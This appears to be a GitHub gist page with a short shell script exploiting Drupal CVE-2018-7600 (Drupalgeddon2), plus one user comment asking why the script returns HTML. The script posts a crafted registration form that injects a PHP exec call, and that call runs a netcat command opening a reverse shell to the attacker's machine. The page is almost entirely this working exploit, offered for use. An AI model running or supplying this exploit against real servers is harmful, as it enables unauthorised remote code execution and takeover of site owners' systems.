Skip to content

Instantly share code, notes, and snippets.

@AlbinoDrought
Created April 12, 2018 18:35
Show Gist options
  • Save AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 to your computer and use it in GitHub Desktop.
Save AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 to your computer and use it in GitHub Desktop.
Drupal CVE-2018-7600 PoC - reverse netcat shell ;)
#!/bin/sh
YOUR_EXTERNAL_IP="172.16.30.108"
YOUR_NETCAT_PORT="6969"
# Start up a netcat server
# netcat -l 6969
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="nohup nc $YOUR_EXTERNAL_IP $YOUR_NETCAT_PORT -e /bin/sh"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
@xuxuedong
Copy link

please, why i was receive some html code, when i execute above shell script? i was using xampp on kali, drupal 8.5.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment